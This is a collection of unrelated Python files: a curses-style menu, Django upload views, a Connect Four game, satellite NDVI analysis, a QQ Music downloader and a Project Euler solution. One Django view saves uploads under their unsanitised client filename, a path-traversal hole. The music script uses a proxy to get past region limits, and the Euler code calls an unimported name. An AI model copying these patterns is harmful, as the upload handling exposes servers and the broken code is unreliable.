self.sub_menu_focus:\n if key.name == 'KEY_ENTER':\n if self.sub is not None:\n self.sub_menu_focus = True\n self.sub.set_main_wnd(self.main_wnd)\n self.sub_menu_base_corner()\n self.sub.on_focus(True)\n self.sub.run()\n return None\n else:\n self.run_selection()\n return None\n else:\n if self.sub is not None:\n key = self.sub.run(key)\n # return None\n self.selection = self.selection % len(self.menu)\n self.on_paint()\n return key\n\n\n#############################################################################\n\nclass SubMenu(MainMenu):\n\n # menu = None\n # cnt = 4\n\n def __init__(self, name=\"\"):\n super().__init__(name)\n # self.term = Terminal()\n\n self.screen_id = self.screen.bind()\n\n self.wnd_border = False # True\n self.background_clr = \"magenta\"\n self.cursor_back_clr = \"bold_red_reverse\"\n self.text_clr = \"white\"\n\n self.position = \"top\"\n\n self.selection = 0\n self.left_top_corner = \"\\u250c\"\n self.right_top_corner = \"\\u2510\"\n self.left_bottom_corner = \"\\u2514\"\n self.right_bottom_corner = \"\\u2518\"\n self.hor_line = \"\\u2500\"\n self.vert_line = \"\\u2502\"\n\n self.next_select = [\"KEY_TAB\", \"KEY_DOWN\"]\n self.prev_select = \"KEY_UP\"\n self.escape = [\"KEY_ESCAPE\", \"KEY_LEFT\"]\n\n self.focus_owner = False\n self.sub_menu_focus = False\n self.parent = None\n self.sub = None\n\n self.wnd_border = True\n\n self.menu_x = 1\n self.menu_y = 1\n self.__get_menu_size()\n\n def __get_menu_size(self):\n\n if self.menu is None:\n return\n\n self.m_height = len(self.menu) - 1\n self.m_max_len = 0\n for m in self.menu:\n self.m_max_len = len(m[0]) if self.m_max_len < len(m[0]) else self.m_max_len\n\n self.m_width = self.m_max_len\n\n if self.wnd_border:\n self.m_width += 2\n self.m_height += 2\n self.gap_x = self.menu_x + 1\n self.gap_y = self.menu_y + 1\n 
self.width = self.m_width - 2\n self.height = self.m_height - 2\n else:\n self.gap_x = self.menu_x\n self.gap_y = self.menu_y\n self.width = self.m_width\n self.height = self.m_height\n\n def is_menu(self) -> bool:\n return True\n\n def sub_menu_base_corner(self):\n if self.sub.is_menu():\n self.sub.set_base_corner(self.menu_x + self.m_width + 1, self.menu_y + self.selection + 1)\n\n def set_base_corner(self, x=0, y=0):\n self.menu_x = x\n self.menu_y = y\n self.__get_menu_size()\n\n def set_parent(self, parent=None):\n self.parent = parent\n\n def on_resize(self, sig, action):\n self.on_paint()\n\n # cnt = 0\n def on_paint(self):\n self.screen.begin()\n self.render()\n self.screen.end()\n\n def render(self):\n\n if not self.focus_owner:\n self.screen.disable_region(self.screen_id)\n return\n\n # height, width = self.term.height, self.term.width\n scr_back_clr = getattr(self.term, 'on_' + self.background_clr)\n text_clr = getattr(self.term, self.text_clr)\n disabled_clr = getattr(self.term, self.disabled_pos_clr)\n\n if self.wnd_border:\n # top corners\n self.screen.echo(self.screen_id, self.menu_x, self.menu_y,\n f'{scr_back_clr}{self.left_top_corner}{self.term.normal}{scr_back_clr}')\n\n self.screen.echo(self.screen_id, self.menu_x + self.m_width, self.menu_y,\n f'{scr_back_clr}{self.right_top_corner}{self.term.normal}{scr_back_clr}')\n\n # bottom corners\n self.screen.echo(self.screen_id, self.menu_x, self.menu_y + self.m_height,\n f'{scr_back_clr}{self.left_bottom_corner}{self.term.normal}{scr_back_clr}')\n\n self.screen.echo(self.screen_id, self.menu_x + self.m_width, self.menu_y + self.m_height,\n f'{scr_back_clr}{self.right_bottom_corner}{self.term.normal}{scr_back_clr}')\n\n # lines\n # horizontal lines\n for ii in range(0, self.m_width - 1, 1):\n self.screen.echo(self.screen_id, ii + self.menu_x + 1, self.menu_y,\n f'{scr_back_clr}{self.hor_line}{self.term.normal}{scr_back_clr}')\n\n # with self.term.location(ii + self.menu_x + 1, self.menu_y + self.m_height):\n self.screen.echo(self.screen_id, ii + self.menu_x + 1, self.menu_y + self.m_height,\n f'{scr_back_clr}{self.hor_line}{self.term.normal}{scr_back_clr}')\n\n # vertical lines\n for ii in range(self.m_height - 1):\n self.screen.echo(self.screen_id, self.menu_x, self.menu_y + ii + 1,\n f'{scr_back_clr}{self.vert_line}{self.term.normal}{scr_back_clr}')\n\n self.screen.echo(self.screen_id, self.menu_x + self.m_width, self.menu_y + ii + 1,\n f'{scr_back_clr}{self.vert_line}{self.term.normal}{scr_back_clr}')\n\n w = self.m_max_len + 1\n\n for (idx, m) in enumerate(self.menu):\n title = m[0]\n if idx == self.selection:\n clr = getattr(self.term, self.cursor_back_clr)\n else:\n clr = scr_back_clr + text_clr\n\n if not self._sub(idx).enable:#m[1]:\n clr = disabled_clr + text_clr\n\n self.screen.echo(self.screen_id, self.gap_x, self.gap_y + idx, f'{clr}{title:{w}}{self.term.normal}{scr_back_clr}')\n\n if self.sub is not None and self.sub_menu_focus:\n self.sub.on_paint()","sub_path":"simpleinterface/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":12443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"167288926","text":"from django.shortcuts import render, HttpResponse\nimport json, os\n\n\ndef ajax(request):\n return render(request, 'ajax.html', locals())\n\n\ndef receive(request):\n print(request.GET)\n print(request.POST)\n print(request.body)\n ret = {'status': True, 'message': 'Okkkkk'}\n\n return HttpResponse(json.dumps(ret))\n\n\ndef files_receive(request):\n print(request.GET)\n print(request.POST)\n print(request.FILES)\n ret = {'status': True, 'message': 'Okkkkk'}\n import json\n return HttpResponse(json.dumps(ret))\n\n\ndef iframe_example(request):\n return render(request, 'iframe_example.html')\n\n\ndef receive_example(request):\n print(request.FILES)\n\n ret = {'status': True, \"data\": None, 'message': None}\n obj = request.FILES.get('img')\n\n file_path = os.path.join('static', obj.name)\n f = open(file_path, 'wb')\n for line in obj.chunks():\n f.write(line)\n f.close()\n\n ret['data'] = file_path\n return HttpResponse(json.dumps(ret))\n","sub_path":"SelfLearn/框架(Django)/181014_ajax詳解/mysite/app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"285010693","text":"import sys\n\n#sys.stdin = open(\"input.txt\", \"r\")\ndef dfs(v):\n global result\n visited[v] = 1\n for r in route:\n if r[v] != 0 and visited[r[v]] ==0 :\n if r[v] == end:\n result = 1\n dfs(r[v])\n\n\n\nfor test_case in range(1, int(input()) + 1):\n V, E = map(int, input().split())\n route = [[0] * (V+1) for _ in range(V+1)]\n for e in range(E):\n a, b = map(int, input().split())\n for p in route:\n if p[a] == 0:\n p[a] = b\n break\n start, end = map(int, input().split())\n result = 0\n visited = [0] * 100\n dfs(start)\n print('#{} {}'.format(test_case, result))\n\n","sub_path":"8월/swea_4871.py","file_name":"swea_4871.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"168946904","text":"from board import *\nfrom communicator import *\nfrom sys import argv\nfrom GUI import GUI\nfrom ai import AI\n\n\nclass Game:\n \"\"\"\n Game class, handles gameplay, gui and communicator\n \"\"\"\n PLAYER_ONE = 0\n PLAYER_TWO = 1\n DRAW = 2\n EMPTY = 3\n MIN_PORT_VALUE = 1000\n MAX_PORT_VALUE = 65535\n\n WINNING_SEQ_LENGTH = 4\n\n ILLEGAL_MOVE = \"Illegal move\"\n INVALID_MESSAGE = \"Invalid message received\"\n INVALID_GAME_STATE = \"Invalid game state\"\n CHECK_WINNER_FLAG_INDEX = 29\n ADD_CHIP_FAILED = \"Failed to add chip to specified column\"\n COMMUNICATOR_MESSAGE_1 = \"CHIP_DATA: \"\n COMMUNICATOR_MESSAGE_2 = \"CHECK_WINNER: \"\n\n EXPECTED_AMOUNT_OF_ARGUMENTS_FOR_CLIENT = 4\n EXPECTED_LENGTH_OF_MESSAGE = 30\n\n def __init__(self):\n \"\"\" Initializes the game class \"\"\"\n # If server mode is on (no IP address provided)\n if len(argv) == 3:\n self.__player = self.PLAYER_ONE\n self.__enemy_player = self.PLAYER_TWO\n self.__current_player = self.__player\n else:\n self.__player = self.PLAYER_TWO\n self.__enemy_player = self.PLAYER_ONE\n self.__current_player = self.__enemy_player\n\n # Create board\n self.__board = Board(self.get_current_player)\n self.__game_over = False\n\n # initializes AI if AI was chosen at run\n self.__ai_flag = False\n if argv[1] == \"ai\":\n self.__ai = AI()\n self.__ai_flag = True\n\n # Create gui\n self.__gui = GUI(self.__player, self.__make_move,\n self.get_current_player, self.__ai_flag)\n\n # If this is the client, disable buttons until player turn\n if self.__player == self.PLAYER_TWO:\n self.__gui.disable_column_buttons()\n\n # TODO:: Ugly code, find a workaround\n self.__last_inserted_chip = None\n\n # Parse data for communicator\n port = int(argv[2])\n ip = None\n\n if len(argv) == self.EXPECTED_AMOUNT_OF_ARGUMENTS_FOR_CLIENT:\n ip = argv[3]\n\n # Initializes communicator\n self.__communicator = Communicator(self.__gui.get_root(), port, ip)\n self.__communicator.connect()\n self.__communicator.bind_action_to_message(\n self.parse_rival_message)\n\n # If AI on server start the game, make a move\n if self.__ai_flag and self.__player == self.PLAYER_ONE:\n self.__ai.find_legal_move(self, self.__make_move)\n\n # Start the gui and game\n self.__gui.get_root().mainloop()\n\n def __make_move(self, column):\n \"\"\" :param column: Column in whivh to place chip \"\"\"\n\n # if game over flag on, returns\n if self.__game_over:\n return\n\n # attempts to place chip in column\n success, row = self.__board.check_legal_move_get_row(\n column, self.PLAYER_ONE if not self.__current_player\n else self.PLAYER_TWO)\n if not success:\n raise Exception(self.ILLEGAL_MOVE)\n\n # Store move for other functions\n self.__last_inserted_chip = column, row\n\n # Relay move to enemy\n self.__communicator.send_message(self.COMMUNICATOR_MESSAGE_1\n + str(column) + \",\" + str(row)\n + \" \" + self.COMMUNICATOR_MESSAGE_2\n + \"1\" if not self.__game_over else\n \"0\")\n\n self.__check_winner(column, row)\n\n def __check_winner(self, column, row):\n \"\"\" :param column: Column of newest chip\n :param row: Row of newest chip \"\"\"\n # Get data if a winning state was reached\n winner, winning_chips = self.__board.find_connected_and_winner(column,\n row)\n\n # Get pixel location for newest chip\n x, y = self.__board.get_chip_location(column, row)\n if winner is None: # If game is still ongoing\n # Create the chip on board\n self.__gui.create_chip_on_board(x, y, self.__current_player,\n board=self.__board)\n\n # Toggle __player in class members\n 
self.__toggle_player()\n\n # Disable full columns\n self.__gui.disable_illegal_columns(self.__board)\n\n else: # Game ended\n self.__game_over = True\n if winner == self.DRAW:\n self.__gui.create_chip_on_board(x, y, self.__current_player,\n board=self.__board)\n self.__gui.disable_column_buttons()\n self.__gui.show_game_over_label(self.DRAW)\n else:\n self.__gui.create_chip_on_board(x, y, self.__current_player,\n winning_chips=winning_chips,\n board=self.__board,\n winner=winner)\n\n def __toggle_player(self):\n \"\"\" Toggles members in the class, also make gui show switching of\n turns \"\"\"\n self.__current_player = self.PLAYER_TWO \\\n if self.__current_player == self.PLAYER_ONE \\\n else self.PLAYER_ONE\n\n flag = self.__current_player == self.__player\n\n self.__gui.end_turn_switch_player(flag)\n\n def get_winner(self):\n \"\"\" Gets the winner if there is one.\n This function is not used by the game \"\"\"\n return self.__board.find_connected_and_winner(\n self.__last_inserted_chip[0], self.__last_inserted_chip[1])[0]\n\n def get_player_at(self, row, col):\n \"\"\" :param row: Row to check\n :param col: Column to check\n :return: Player at place\n \"\"\"\n player = int(self.__board.get_columns()[col][row])\n return None if player == self.EMPTY else player\n\n def get_current_player(self):\n \"\"\" Getter for current __player \"\"\"\n return self.__current_player\n\n def get_board(self):\n \"\"\" Getter for board \"\"\"\n return self.__board\n\n def parse_rival_message(self, message):\n \"\"\" :param message: Message received from enemy \"\"\"\n # Check message of corect length\n if len(message) != self.EXPECTED_LENGTH_OF_MESSAGE:\n raise Exception(self.INVALID_MESSAGE)\n\n # Parse data from message\n column = int(message[11])\n expected_row = int(message[13])\n\n # Update board and check if same row was returned\n success, row = self.__board.check_legal_move_get_row(\n column, self.PLAYER_ONE if not self.__current_player\n else self.PLAYER_TWO)\n\n # Assert it\n assert row == expected_row\n\n if success:\n # Update member\n self.__last_inserted_chip = column, row\n check_winner_flag = message[self.CHECK_WINNER_FLAG_INDEX]\n if check_winner_flag:\n self.__check_winner(column, row)\n\n else:\n raise Exception(self.ADD_CHIP_FAILED)\n\n self.__gui.disable_illegal_columns(self.__board)\n\n # If the AI is playing, make another move\n if self.__ai_flag and not self.__game_over:\n self.__ai.find_legal_move(self, self.__make_move)\n\n def get_last_inserted_chip(self):\n \"\"\" Getter for last inserted chip \"\"\"\n return self.__last_inserted_chip\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"264990029","text":"'''\nCreated on 2011-11-7\n\n@author: liuxue\n'''\nfrom django.conf.urls.defaults import patterns, url\n\nurlpatterns = patterns('apis.accounts.views',\n url(r'^login/$', 'accountLogin', name = 'accountLogin'),\n url(r'^regist/$', 'accountRegist', name = 'accountRegist'),\n url(r'^logout/$', 'accountLogout', name = 'accountLogout'),\n)\n","sub_path":"partyAssistant-backend/PartyAssistant/apis/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"133568899","text":"import pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom matplotlib import image\nfrom import_from_S3 import get_dates\nfrom import_from_local import get_mask, get_wavelength, get_image, get_mask_partition\nimport statistics\nimport os\nimport sys\nimport numpy.ma as ma\n\nsys.setrecursionlimit(10**6)\n\n\n# Code the colour bands\nBLUE = 'B02'\nGREEN = 'B03'\nRED = 'B04'\nNIR = 'B08'\n\n# Create a dictionary for the VI's\nVI_dict = {}\n\n\n# SAVI calculation\ndef calculate_SAVI(NIR, RED, L):\n return (NIR - RED) / (NIR + RED + L) * (1+L)\n\n# NDVI calculation\ndef calculate_NDVI(NIR, RED):\n return (NIR - RED) / (NIR + RED) \n\n# ENDVI calcuation\ndef calculate_ENDVI(NIR, GREEN, BLUE):\n return ((NIR+GREEN) - (2*BLUE)) / ((NIR+GREEN) + (2*BLUE)) \n\n# GNDVI calcuation\ndef calculcate_GNDVI(NIR, GREEN):\n return (NIR - GREEN) / (NIR + GREEN)\n\ndef split_mask(X,Y):\n # print(os.getcwd())\n mask = get_mask(X, Y)\n split_mask = []\n for i in range(0,512):\n row = []\n for j in range(0,512):\n row.append(-1)\n split_mask.append(row)\n\n count = 1\n for i in range(0,512):\n for j in range(0,512):\n if (split_mask[i][j]==-1):\n if(mask[i,j,3]==255):\n bfs(i,j,i,j,mask, split_mask, count, 0)\n count+=1\n else:\n split_mask[i][j] = 0\n total = 0\n number = 1\n\n for x in range(1,count):\n mask = get_mask(X, Y)\n arr = np.array(split_mask)\n total = 0\n for i in range(0,512):\n for j in range(0,512):\n if split_mask[i][j] !=x:\n mask[i,j,3] = 0\n else:\n total +=1\n if (total > 100):\n data = mask.astype(np.uint8)\n img = Image.fromarray(data, 'RGBA') \n filename = f'../data/partition-mask/mask-x{X}-y{Y}-{number}.png'\n number+=1\n path = os.path.join(os.getcwd(), filename)\n print(path)\n img.save(path)\n\n\n\n\ndef bfs(i,j, i_prev, j_prev, mask, split_mask, idx, dept):\n if i>=0 and i <=511 and j>=0 and j<=511:\n if mask[i,j,3] == 255 and split_mask[i][j]==-1:\n split_mask[i][j] = idx\n i1 = i-1\n i2 = i+1\n j1 = j-1\n j2 = j+1\n temp = dept + 1\n if (temp < 45000):\n if i2<512 and (i2 != i_prev or j != j_prev) and mask[i2,j,3] == 255 and split_mask[i2][j]==-1:\n temp = temp+1\n bfs(i2,j, i,j, mask, split_mask, idx, temp)\n if j1>=0 and (i != i or j1 != j_prev) and mask[i,j1,3] == 255 and split_mask[i][j1]==-1:\n temp = temp+1\n bfs(i,j1, i,j, mask, split_mask, idx, temp)\n if i1>=0 and (i1 != i_prev or j != j_prev) and mask[i1,j,3] == 255 and split_mask[i1][j]==-1:\n temp = temp+1\n bfs(i1,j, i,j, mask, split_mask, idx, temp)\n if j2<512 and (i != i or j2 != j_prev) and mask[i,j2,3] == 255 and split_mask[i][j2]==-1:\n temp = temp+1\n bfs(i,j2, i,j, mask, split_mask, idx, temp)\n\n\n# UNCOMMENT THIS TO GENERATE PARTITION MASK\n# split_mask('7680', '10240')\n\ndef generate_VI_timeseries_DF(X,Y, path):\n dates = get_dates()\n\n for j in range(1,23):\n result = {}\n\n result['date'] = []\n\n result[BLUE] = []\n result[GREEN] = []\n result[RED] = []\n result[NIR] = []\n result['NDVI'] = []\n result['SAVI'] = []\n result['ENDVI'] = []\n result['GNDVI'] = []\n\n result['B02_UPPER'] = []\n result['B03_UPPER'] = []\n result['B04_UPPER'] = []\n result['B08_UPPER'] = []\n result['NDVI_UPPER'] = []\n result['SAVI_UPPER'] = []\n result['ENDVI_UPPER'] = []\n result['GNDVI_UPPER'] = []\n\n result['B02_LOWER'] = []\n result['B03_LOWER'] = []\n result['B04_LOWER'] = []\n result['B08_LOWER'] = []\n result['NDVI_LOWER'] = []\n result['SAVI_LOWER'] = []\n result['ENDVI_LOWER'] = []\n result['GNDVI_LOWER'] = []\n for date in dates:\n \n # BAND\n red = 
get_wavelength(X,Y,RED,date)\n blue = get_wavelength(X,Y,BLUE,date)\n green = get_wavelength(X,Y,GREEN,date)\n nir = get_wavelength(X,Y,NIR,date)\n\n # VI \n ndvi = calculate_NDVI(nir,red)\n endvi = calculate_ENDVI(nir, green, blue)\n gndvi = calculcate_GNDVI(nir, green)\n savi = calculate_SAVI(nir, red, 0.5)\n\n # MASK + IMG\n img = get_image(X,Y,date)\n mask = get_mask_partition(X,Y,str(j))\n\n # MASKING + FILTER\n mask1 = mask[:,:,3] != 255\n mask2 = np.logical_or(np.logical_or(img[:,:,0] >=200, img[:,:,1] >=200), img[:,:,2] >=200)\n mask3 = np.logical_or(mask1,mask2)\n \n # CALCULATE AVERAGE, STD\n\n red_res = ma.masked_array(red, mask=mask3)\n r_avg = red_res.mean()\n r_std = red_res.std()\n\n green_res = ma.masked_array(green, mask=mask3)\n g_avg = green_res.mean()\n g_std = green_res.std()\n\n blue_res = ma.masked_array(blue, mask=mask3)\n b_avg = blue_res.mean()\n b_std = blue_res.std()\n\n nir_res = ma.masked_array(nir, mask=mask3)\n n_avg = nir_res.mean()\n n_std = nir_res.std()\n\n if (r_avg is ma.masked or g_avg is ma.masked or b_avg is ma.masked or n_avg is ma.masked):\n continue\n if (r_std is ma.masked or g_std is ma.masked or b_std is ma.masked or n_std is ma.masked):\n continue\n\n ndvi_res = ma.masked_array(ndvi, mask=mask3)\n ndvi_avg = ndvi_res.mean()\n ndvi_std = ndvi_res.std()\n\n endvi_res = ma.masked_array(endvi, mask=mask3)\n endvi_avg = endvi_res.mean()\n endvi_std = endvi_res.std()\n\n gndvi_res = ma.masked_array(gndvi, mask=mask3)\n gndvi_avg = gndvi_res.mean()\n gndvi_std = gndvi_res.std()\n\n savi_res = ma.masked_array(savi, mask=mask3)\n savi_avg = savi_res.mean()\n savi_std = savi_res.std()\n\n # append result\n \n if (ndvi_avg is ma.masked or endvi_avg is ma.masked or gndvi_avg is ma.masked or savi_avg is ma.masked):\n continue\n if (ndvi_std is ma.masked or endvi_std is ma.masked or gndvi_std is ma.masked or savi_std is ma.masked):\n continue\n\n result[BLUE].append(b_avg)\n result['B02_LOWER'].append(b_avg-b_std)\n result['B02_UPPER'].append(b_avg+b_std)\n\n result[GREEN].append(g_avg)\n result['B03_LOWER'].append(g_avg-g_std)\n result['B03_UPPER'].append(g_avg+g_std)\n\n result[RED].append(r_avg)\n result['B04_LOWER'].append(r_avg-r_std)\n result['B04_UPPER'].append(r_avg+r_std)\n\n result[NIR].append(n_avg)\n result['B08_LOWER'].append(n_avg-n_std)\n result['B08_UPPER'].append(n_avg+n_std)\n\n result['NDVI'].append(ndvi_avg)\n result['NDVI_LOWER'].append(ndvi_avg-ndvi_std)\n result['NDVI_UPPER'].append(ndvi_avg+ndvi_std)\n\n result['ENDVI'].append(endvi_avg)\n result['ENDVI_LOWER'].append(endvi_avg-endvi_std)\n result['ENDVI_UPPER'].append(endvi_avg+endvi_std)\n\n result['GNDVI'].append(gndvi_avg)\n result['GNDVI_LOWER'].append(gndvi_avg-gndvi_std)\n result['GNDVI_UPPER'].append(gndvi_avg+gndvi_std)\n\n result['SAVI'].append(savi_avg)\n result['SAVI_LOWER'].append(savi_avg-savi_std)\n result['SAVI_UPPER'].append(savi_avg+savi_std)\n result['date'].append(date)\n\n df = pd.DataFrame(result)\n print(j)\n save_path = f'{path}result-{X}x-{Y}y-{j}'\n df.to_feather(save_path) \n\n\n\n\n\n\n\n\nX = '7680'\nY = '10240'\n\n# generate_VI_timeseries_DF(X,Y, 'temp/')\n\n# temp = pd.read_feather('temp/result-7680x-10240y-1')\n# print(temp.head(10)) \n\n# temp2 = pd.read_feather('temp/result-7680x-10240y-2')\n# print(temp2.head(10)) \n\n# temp2 = pd.read_feather('temp/result-7680x-10240y-3')\n# print(temp2.head(10)) \n# df = pd.DataFrame({'x':[1]})\n# j=1\n# path = 'result/'\n# save_path = f'{path}result-{X}x-{Y}y-{j}'\n# df.to_feather(save_path)\n# date = 
get_dates()[0]\n\n# red = get_wavelength(X,Y,RED,date)\n# img = get_image(X,Y,date)\n\n# # # print(red)\n\n# mx = ma.masked_array(np.array([1,2,3]), mask=[0, 0, 1])\n# print(mx)\n# print(type(mx[2]))\n# print(mx[2]=='--')\n# print(ma.masked)\n# if(mx[2] is ma.masked ):\n# print('asd')\n# else:\n# print('xxxx')\n\n# mask = get_mask(X, Y)\n\n\n# mask1 = mask[:,:,3] != 255\n\n\n# # temp2 = img[:,:] >= [200,200,200]\n# # print(temp)\n\n# mask2 = np.logical_or(np.logical_or(img[:,:,0] >=200, img[:,:,1] >=200), img[:,:,2] >=200)\n\n# mask = np.logical_or(mask1,mask2)\n\n# mx = ma.masked_array(red, mask=mask)\n# print(mx.mean())\n# print(mx.std())\n\n\n# # print(temp)\n\n# mx = ma.masked_array(red, mask=temp)\n# print(mx)\n\n\n# img = get_image(X,Y,'TCI',date)\n\n# (img[:,:,0] > 200 \n# print(temp)\n#get_VI_DF('7680', '10240','data/')","sub_path":"code_repository/create_VI_timeseries.py","file_name":"create_VI_timeseries.py","file_ext":"py","file_size_in_byte":9353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"105612857","text":"import time\r\nimport sys\r\nimport logging\r\nimport requests\r\nfrom pyquery import PyQuery\r\nfrom settings import *\r\n\r\n# reusable logging code snippet\r\nlogger = logging.getLogger(__name__)\r\nlogger.setLevel(logging.INFO)\r\nfmt = logging.Formatter('%(levelname)s: %(message)s')\r\nfh = logging.FileHandler('qqmusic.log', encoding='utf-8', mode='w')\r\nsh = logging.StreamHandler(sys.stdout)\r\nfh.setFormatter(fmt)\r\nsh.setFormatter(fmt)\r\nlogger.addHandler(fh)\r\nlogger.addHandler(sh)\r\n\r\n\r\nclass QQMusic:\r\n\r\n def __init__(self):\r\n\r\n # song specific params\r\n self.songmid = None\r\n self.title = None\r\n self.singer = None\r\n self.vkey = None\r\n\r\n def set_songmid(self, songmid):\r\n if len(songmid) == 14:\r\n self.songmid = songmid\r\n return True\r\n else:\r\n logger.error(\"invalid songmid\")\r\n return False\r\n\r\n def get_info(self):\r\n\r\n # get song's title and artist for naming purpose\r\n info_url = proto_info_url.format(self.songmid)\r\n info_res = requests.get(info_url)\r\n if info_res.status_code == 200:\r\n doc = PyQuery(info_res.text)\r\n self.title = doc('title').text().split('-')[0]\r\n self.singer = doc('title').text().split('-')[1].split(' - ')[0].strip()\r\n logger.info(\"song's title is \" + self.title)\r\n logger.info(\"song's singer is \" + self.singer)\r\n return True\r\n else:\r\n logger.error(\"unable to obtain song's info\")\r\n return False\r\n\r\n def get_vkey(self):\r\n\r\n # send HTTP request for vkey of specific song\r\n vkey_url = proto_vkey_url.format(self.songmid, self.songmid)\r\n\r\n # try several times until connection succeeds\r\n vkey_res = None\r\n for i in range(1, max_try):\r\n try:\r\n if enable_proxy == 'True':\r\n logger.info(\"connecting using proxies\")\r\n # ip check only happens here\r\n vkey_res = requests.get(vkey_url, proxies=mainland_proxy, timeout=10)\r\n else:\r\n logger.info(\"connecting\")\r\n vkey_res = requests.get(vkey_url)\r\n except IOError:\r\n continue\r\n logger.info(\"connected\")\r\n break\r\n\r\n if vkey_res is not None:\r\n try:\r\n # extract vkey from response\r\n pydict = vkey_res.json() # same as: pydict = json.loads(vkey_res.text)\r\n self.vkey = pydict['data']['items'][0]['vkey']\r\n logger.info(\"vkey is \" + self.vkey)\r\n return True\r\n except ValueError:\r\n logger.error(\"invalid songmid!\")\r\n else:\r\n logger.error(\"connection failed!\")\r\n return False\r\n\r\n def download_music(self):\r\n start = time.time()\r\n # begin downloading if vkey is not empty\r\n if self.vkey:\r\n download_url = proto_download_url.format(self.songmid, self.vkey)\r\n download_res = requests.get(url=download_url, stream=True)\r\n logger.info(\"status code: \" + str(download_res.status_code))\r\n if download_res.status_code == 200:\r\n with open(self.singer + ' - ' + self.title + '.mp3', 'wb') as f:\r\n for chunk in download_res.iter_content(1024):\r\n f.write(chunk)\r\n end = time.time()\r\n logger.info(\"download completed!\")\r\n logger.info(\"time taken: {0:6.4f} seconds\".format(end - start))\r\n else:\r\n logger.error('unable to download!')\r\n else:\r\n logger.error(\"no vkey found!\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n music = QQMusic()\r\n result = music.set_songmid(input())\r\n if result:\r\n result = music.get_info()\r\n if result:\r\n result = music.get_vkey()\r\n if result:\r\n 
music.download_music()\r\n","sub_path":"qqmusic.py","file_name":"qqmusic.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"456228363","text":"import re\nimport sys\n\nJIRA_ID_REGEX = re.compile(r\"[A-Z]+-\\d+\")\n\nMISSING_JIRA_ID_MSG = \"\"\"\nCommit message is missing [JIRA task id].\n\nInclude [JIRA task id] in commit message, like so:\n#################################\nABC-123 this is my commit message\n#################################\nwhere ABC-123 is a sample [JIRA task id].\n\nFor more details check:\nhttps://confluence.atlassian.com/adminjiracloud/integrating-with-development-tools-776636216.html\n\"\"\"\n\n\ndef jira_id_in_commit_msg(commit_msg: str) -> bool:\n return bool(re.match(JIRA_ID_REGEX, commit_msg))\n\n\ndef commit_msg_hook(commit_msg_filepath: str) -> None:\n \"\"\"Scans for valid jira task id in commit message\n\n https://pre-commit.com/#pre-commit-for-commit-messages\"\"\"\n\n with open(commit_msg_filepath) as commit_msg:\n if not jira_id_in_commit_msg(commit_msg.read()):\n sys.exit(MISSING_JIRA_ID_MSG)\n\n\nif __name__ == \"__main__\":\n commit_msg_hook(sys.argv[1])\n","sub_path":".hooks/jira_id/jira_id_check.py","file_name":"jira_id_check.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"471106735","text":"#!/usr/bin/env python3\n\"\"\"\nFile Name : Problem124.py\nDate started : 2013-01-18\nDate solved : 2013-3-27\nRun Time :\n\nThe radical of n, rad(n), is the product of distinct prime factors of n.\n For example, 504 = 2^3 * 3^2 * 7, so rad(504) = 2 * 3 * 7 = 42.\n\nIf we calculate rad(n) for 1 <= n <= 10, then sort them on rad(n), and sorting\n on n if the radical values are equal, we get:\n\n Unsorted Sorted\n n rad(n) n rad(n) k\n 1 1 1 1 1\n 2 2 2 2 2\n 3 3 4 2 3\n 4 2 8 2 4\n 5 5 3 3 5\n 6 6 9 3 6\n 7 7 5 5 7\n 8 2 6 6 8\n 9 3 7 7 9\n 10 10 10 10 10\n\nLet E(k) be the kth element in the sorted n column;\n for example, E(4) = 8 and E(6) = 9.\n\nIf rad(n) is sorted for 1 <= n <= 100000, find E(10000).\n\n\"\"\"\n\nimport project_euler\nimport functools\nimport project_euler.primes\n\nPROBLEM_NUMBER = 124\nSOLVED = 1\n\n\ndef _compare(this, other):\n if this[1] == other[1]:\n return this[0] - other[0]\n return this[1] - other[1]\n\n_primeFactorProducts = dict()\n\n\ndef getProd(n):\n if n < 2:\n return 1\n elif n in _primeFactorProducts:\n return _primeFactorProducts[n]\n elif primes.isprime(n):\n _primeFactorProducts[n] = n\n return n\n product = 1\n orig = n\n for i in project_euler.primes.generatePrimesUnder(n):\n if i > n:\n break\n if not n % i:\n while not n % i:\n n //= i\n product *= getProd(i)\n _primeFactorProducts[orig] = product\n return product\n\n\ndef problem124_1():\n radList = [(1, 1)]\n for base in range(2, 10 ** 6 + 1):\n pair = base, getProd(base)\n radList.append(pair)\n radList.sort(key=functools.cmp_to_key(_compare))\n return radList[9999]\n\n\ndef problem124(input_=None):\n radList = [(1, 1)]\n for base in range(2, 10 ** 6 + 1):\n pair = base, getProd(base)\n radList.append(pair)\n radList.sort(key=functools.cmp_to_key(_compare))\n return radList[9999]\n\n\ndef run():\n print(project_euler.print_timing(problem124))\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"problems/Problem124.py","file_name":"Problem124.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
